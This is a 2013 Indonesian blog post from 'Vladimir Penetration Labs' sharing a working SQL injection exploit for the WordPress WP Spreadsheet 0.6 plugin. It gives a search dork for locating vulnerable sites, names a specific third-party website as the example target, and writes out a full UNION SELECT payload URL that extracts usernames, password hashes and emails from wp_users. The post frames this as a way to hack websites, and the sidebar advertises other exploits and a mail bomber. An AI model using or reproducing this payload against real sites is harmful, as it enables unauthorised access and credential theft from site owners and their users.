SQLi WP Spreadsheet v 0.6

Posted by : Unknown Selasa, 30 April 2013

Selamat malam dan apa kabar,maaf sebelumnya ini blog baru lagi :3 karena blog sebelum nya saya lupa email :ngakak: . Saya akan share Exploit WP Spreadsheet Wordpress , langsung aja ya di cobain..

Sebelumnya kita harus cari Dork nya dulu,seperti ini :

Dork : inurl:/wp-content/plugins/wpSS/
Lalu kita mencari Examplenya seperti ini :
http://www.aideenrogers.com/wp-content/plugins/wpSS/
Disini kita langsung saja menambah kan file .PHP plugin nya Seperti ini 
http://www.aideenrogers.com/wp-content/plugins/wpSS/ss_load.php
 Nah mari kita coba SQLi nya dengan menambahkan sedikit resep code :ngakak: seperti ini :
http://www.aideenrogers.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain

Nah sebagai contoh kita udah masuk ke ss_load.php nya seperti ini :
Disitu ada Tulisan Hacked by , jadi kita sudah bisa langsung meng-hack website itu lewat Spreadsheet nya :)

* Untuk plugin yang belum terpatch,textnya akan tetap menjadi seperti itu . jikalau sudah di patch berarti tidak bisa di genti text nya :) *

Sekian dan terimakasih,
Semoga bermanfaat ya

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Blogger templates

Welcome to My Blog

Popular Post

  • Com_Media Exploit
    Haloo bro ,, balik lagi sama gue :D skrg ane mau share tentang com_media exploit :D jadi kita langsung tanam exploit dan upload deh file de...
  • Fresh Socks4 & Socks5
      Apa itu "SOCKS"? Socks5 / 4 proxy adalah proxy serbaguna untuk smua penggunaan sedangkan http proxy hanya dapat digunakan un...
  • Memudahkan Registry GWarnet untuk Gemscool
    Hallo,lagi jalan2 ke forum sebelah nemu Trik buat Memudahkan Registry GWarnet untuk game Gemscool nih , langsung aja curi Source Code dibawa...
  • Internet Gratis Smartfren
    Selamat malam , lagi jalan2 ke blognya si septo maho :v nemu ginian , yaudah deh lapor dulu buat di copas . dan ternyata di bolehin :ngakaks...
  • MDBTemplate Exploit Theme Uploader
    Halo , saya akan share dimana sebelumnya saya juga share tentang IMCE Drupal Uploader dan kali ini juga saya akan share tentang MDBTemplate...
  • Wordpress Remote File Uploadify
    Hallo selamat malam,saya akan share tentang Exploit baru lagi nih , yaitu Wordpress Remote File Uploadify ... jadi trik ini simpel ko kit...
  • Anonymous File Locker [Encryp & Decrypt]
    Haloo,,udah lama gak posting di blog kali ini saya akan share tentang File Locker .. Apa sih file locker itu ? Jadi disini Anonymous File ...
  • Com_Fabrik Exploit
    Halo,kembali lagi dengan saya bang vladimir :D Kali ini saya akan share tentang Exploit Com_Fabrik exploit ini hampir sama dengan exploit s...
  • CBF Tools - GMail Bomber
    CBF Team has been Released a new Tools , with new Added Bomber Mail . Here a Screenshot You must have this tools,the tools awesome for a...
  • SQLi WP Spreadsheet v 0.6
    Selamat malam dan apa kabar,maaf sebelumnya ini blog baru lagi :3 karena blog sebelum nya saya lupa email :ngakak: . Saya akan share Exploit...

Blogger templates

Followers

Copyright © Vladimir Penetration Labs 2013. Diberdayakan oleh Blogger.

- Copyright © :: Vladimir Penetration Labs :: -Robotic Notes- Powered by Blogger - Designed by Johanes Djogan -